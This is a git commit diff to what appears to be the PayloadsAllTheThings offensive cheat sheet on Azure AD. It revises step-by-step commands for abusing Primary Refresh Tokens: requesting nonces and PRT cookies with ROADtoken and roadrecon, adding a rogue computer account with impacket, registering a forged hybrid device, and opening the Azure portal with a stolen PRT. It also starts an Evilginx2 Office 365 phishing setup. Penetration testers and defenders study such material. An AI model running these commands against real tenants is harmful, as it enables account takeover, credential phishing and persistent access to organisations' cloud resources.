Fix markdown typo

pull/1/head
Swissky 2023-11-22 17:42:09 +01:00
parent 8a4e7f82ae
commit ce9e94fe47
2 changed files with 11 additions and 7 deletions

View File

@ -114,25 +114,28 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
* No method known to date. * No method known to date.
### Use PRT cookie ### Request a PRT using the Refresh Flow
* `roadrecon auth prt-init` * Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) * Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` * `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>` * Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
### Request a PRT with Hybrid Device ### Request a PRT with Hybrid Device
Requirements: Requirements:
* ADDS user credentials * ADDS user credentials
* hybrid environment (ADDS and Azure AD) * hybrid environment (ADDS and Azure AD)
Use the user account to create a computer and request a PRT Use the user account to create a computer and request a PRT
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>` * Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>` * Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'` * Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
* Get a PRT with device claim * Get a PRT with device claim
```ps1 ```ps1
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password> roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
@ -157,3 +160,4 @@ Use the user account to create a computer and request a PRT
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0) * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program) * [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)

View File

@ -102,7 +102,7 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
## Phishing with Evilginx2 ## Phishing with Evilginx2
* Run `evilginx2` with o365 phishlet * Run [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) with o365 phishlet
```powershell ```powershell
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp : config domain username.corp